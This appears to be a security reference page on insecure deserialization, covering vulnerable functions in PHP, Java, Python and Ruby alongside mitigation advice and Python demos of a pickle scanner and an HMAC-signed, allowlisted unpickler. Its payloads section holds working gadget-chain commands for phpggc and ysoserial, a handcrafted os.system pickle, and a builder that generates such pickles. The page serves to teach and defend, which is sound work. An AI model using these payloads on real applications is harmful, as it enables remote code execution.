🧠 Description

Insecure deserialization occurs when an application deserializes untrusted data without validating it first. Because native serialization formats (Java object streams, PHP serialize(), Python pickle, Ruby Marshal) encode class names and, in effect, calls to make while rebuilding objects, an attacker who controls the bytes can chain existing application or library classes ("gadget chains") into code execution, or supply a stream that exhausts memory or CPU for a denial of service.

Impact:
  • Remote Code Execution
  • Authentication bypass
  • Denial of Service

🎯 Attack Surface

  • ✅ PHP: unserialize() (including on data read from cookies, sessions, or phar:// metadata)
  • ✅ Java: readObject(), ObjectInputStream
  • ✅ Python: pickle.loads, yaml.load without SafeLoader, marshal/shelve/jsonpickle
  • ✅ Ruby: Marshal.load

💣 Payloads

PHP (phpggc) - the chain must match a library present on the target; Monolog/RCE1 is shown as an example and takes a function name and its argument:
phpggc Monolog/RCE1 system id
Java (ysoserial) - the chain must match a library on the target classpath and a JDK old enough for it; the output is raw bytes, so base64 it before pasting into a request:
java -jar ysoserial.jar CommonsCollections1 "id" | base64 -w0
Python - a protocol-0 stream that imports os.system and calls it with "id" while loading (GLOBAL, MARK, STRING, TUPLE, REDUCE, STOP; the ( MARK before the argument is required):
pickle.loads(b"cos\nsystem\n(S'id'\ntR.")
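
As an added example (not code from the original page): building the Python payload above from a `__reduce__` gadget, and statically listing the globals a pickle would import using the standard-library `pickletools` so a suspicious stream can be triaged without ever calling `pickle.loads`. The class and function names (`Gadget`, `imported_globals`, `is_suspicious`) and the benign sample object are this example's own; the payload bytes are constructed here and are never executed.

```python
import os
import pickle
import pickletools

# The protocol-0 payload from the Payloads section (constructed here, never loaded):
#   c GLOBAL os system   ( MARK   S STRING 'id'   t TUPLE   R REDUCE   . STOP
HANDCRAFTED = b"cos\nsystem\n(S'id'\ntR."


class Gadget:
    """Same primitive the handcrafted bytes encode: on load, call os.system(cmd)."""

    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        # pickle serialises (callable, args) as GLOBAL/STACK_GLOBAL + REDUCE.
        return (os.system, (self.cmd,))


def build_payload(cmd="id", protocol=0):
    """Generate the same gadget for any pickle protocol (0-5)."""
    return pickle.dumps(Gadget(cmd), protocol=protocol)


def benign_payload():
    """A data-only pickle (constructed sample) with no globals at all."""
    return pickle.dumps({"user": "alice", "roles": ["admin"]}, protocol=4)


# Opcodes that push a string onto the stack (needed to resolve STACK_GLOBAL).
_STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
               "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
# Opcodes that invoke a callable or constructor during unpickling.
_CALL_OPS = {"REDUCE", "BUILD", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def imported_globals(data):
    """Statically list every (module, name) the stream would import, without loading it."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":          # protocols 0-3: "module name" in one argument
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":  # protocol 4+: module and name were pushed just before
            found.append((strings[-2], strings[-1]))
        elif op.name in _STRING_OPS:
            strings.append(arg)
    return found


def calls_code(data):
    """True if the stream contains an opcode that calls something during load."""
    return any(op.name in _CALL_OPS for op, _arg, _pos in pickletools.genops(data))


def is_suspicious(data, allowed=frozenset()):
    """Flag a pickle that imports a global outside `allowed` and also invokes code."""
    return calls_code(data) and any(g not in allowed for g in imported_globals(data))


if __name__ == "__main__":
    pickletools.dis(HANDCRAFTED)          # human-readable opcode listing
    print(imported_globals(HANDCRAFTED))  # [('os', 'system')]
    print(is_suspicious(build_payload("id", 4)), is_suspicious(benign_payload()))
```

`pickle.dumps` records `os.system` under the module it is actually defined in (`posix` on Linux/macOS, `nt` on Windows), which is why a scanner has to resolve the global rather than grep for the literal string `os`.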

🛡️ Mitigation

✅ Don't deserialize untrusted data at all; if a native serialized format must cross a trust boundary, treat the bytes as hostile input and never pass them straight to unserialize()/readObject()/pickle.loads/Marshal.load

✅ Use digital signatures (or a keyed MAC such as HMAC) over the serialized bytes and verify them before the deserializer ever sees the data; the key must stay server-side

✅ Implement integrity checks and class allowlists as defence in depth: Java ObjectInputFilter (JEP 290), PHP unserialize($data, ['allowed_classes' => [...]]), Python an Unpickler subclass that restricts find_class, Ruby/YAML Psych.safe_load; a blocklist of known gadget classes alone is bypassable

✅ Use JSON over serialized formats: a data-only format carries no class or callable information, so there is nothing for a gadget chain to invoke (keep type-resolving options such as Jackson's default typing disabled)
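
An added example (not the page's own code) of the signature/integrity and allowlist advice combined in Python: an HMAC-SHA256 tag over the serialized bytes is verified before any unpickling happens, and a `pickle.Unpickler` subclass refuses any global outside an explicit allowlist, so even a correctly signed malicious stream (key compromise) never reaches `os.system`. The key, the allowlist contents, the sample session object and the helper names (`seal`, `open_sealed`, `try_open`) are assumptions made for this demo.

```python
import hashlib
import hmac
import io
import pickle

# Constructed demo key; in production this stays server-side (e.g. a secrets
# manager) and is never shipped to clients.
KEY = b"constructed-demo-key-do-not-reuse"
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes

# The os.system("id") stream from the Payloads section, constructed only so the
# demo can show it being rejected; it is never executed.
MALICIOUS_PICKLE = b"cos\nsystem\n(S'id'\ntR."


class RestrictedUnpickler(pickle.Unpickler):
    """Defence in depth: resolve only globals on an explicit allowlist."""

    ALLOWED = {("collections", "OrderedDict"), ("datetime", "datetime")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        # Raising here stops GLOBAL/STACK_GLOBAL before REDUCE can run anything.
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def sign_raw(data, key=KEY):
    """Prefix serialized bytes with HMAC-SHA256(key, data)."""
    return hmac.new(key, data, hashlib.sha256).digest() + data


def seal(obj, key=KEY):
    """Serialize a trusted object and sign the resulting bytes."""
    return sign_raw(pickle.dumps(obj, protocol=4), key)


def open_sealed(blob, key=KEY):
    """Verify the tag first; only then hand the bytes to the restricted unpickler."""
    if len(blob) < TAG_LEN:
        raise ValueError("blob too short to carry a tag")
    tag, data = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(key, data, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        raise ValueError("MAC mismatch: refusing to deserialize")
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_open(blob, key=KEY):
    """Return ('ok', obj) or ('rejected', reason) instead of raising, for the demo."""
    try:
        return ("ok", open_sealed(blob, key))
    except (ValueError, pickle.UnpicklingError) as exc:
        return ("rejected", str(exc))


def tamper(blob):
    """Flip one bit in the serialized body while leaving the tag untouched."""
    body = bytearray(blob)
    body[-1] ^= 0x01
    return bytes(body)


if __name__ == "__main__":
    session = {"user": "alice", "roles": ["admin"]}
    print(try_open(seal(session)))                  # ('ok', {...})
    print(try_open(tamper(seal(session))))          # ('rejected', 'MAC mismatch: ...')
    print(try_open(MALICIOUS_PICKLE))               # ('rejected', 'blob too short ...')
    print(try_open(sign_raw(MALICIOUS_PICKLE)))     # ('rejected', 'global os.system is forbidden')
```

The order matters: the MAC is checked over the raw bytes before any parsing, so a tampered or unsigned stream is dropped without touching the deserializer. The allowlist is the fallback for the case the first control fails, which is why the demo signs the malicious stream with the real key and still gets a rejection.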

🛠️ Tools

  • phpggc - PHP gadget chain generator (chains per framework/library, e.g. Monolog, Laravel, Symfony)
  • ysoserial - Java gadget chain payload generator (chains per library on the target classpath)
  • ysoserial.net - .NET gadget chain payload generator (BinaryFormatter, Json.Net, ViewState and other formatters)
